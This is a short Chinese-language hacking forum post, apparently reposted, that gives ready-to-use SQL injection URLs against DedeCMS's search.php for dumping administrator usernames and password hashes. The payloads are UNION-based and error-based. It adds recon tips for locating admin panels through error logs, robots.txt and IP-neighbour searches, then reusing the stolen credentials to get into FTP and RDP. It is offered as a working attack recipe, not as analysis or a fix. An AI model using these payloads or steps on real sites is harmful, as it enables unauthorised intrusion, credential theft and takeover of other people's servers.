首先：

注入exp

有时候 有些 /plus/目录换成了 /plugins目录

/plugins/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a

/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a

/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a

/plus/search.php?keyword=as&typeArr[ uNion ]=a

/robots.txt

/data/admin/ver.txt

/data/mysql_error_trace.inc

第一 个看这里 /data/mysql_error_trace.inc 爆出来补 

第二 个  域名作为后台 或者域名变形一下

第三 个 先ping域名 获得ip地址 之后 

http://www.bing.com/

搜索 ip:127.0.0.1  php 有可能获得后台 也可以获得其他旁注站 一般dedecms的旁站很多也是dedecms 的  

第四 个  查看 robots.txt

  查看旁注站dedecms的站  再去社工目标站的后台地址也可以

第五 个  注入exp得到账号 去社工 ftp 和 3389密码  

至少今天我都有成功过 

欢迎机友一起分享经验  欢迎 总结  补充

转自：https://forum.90sec.org/thread-5081-1-1.html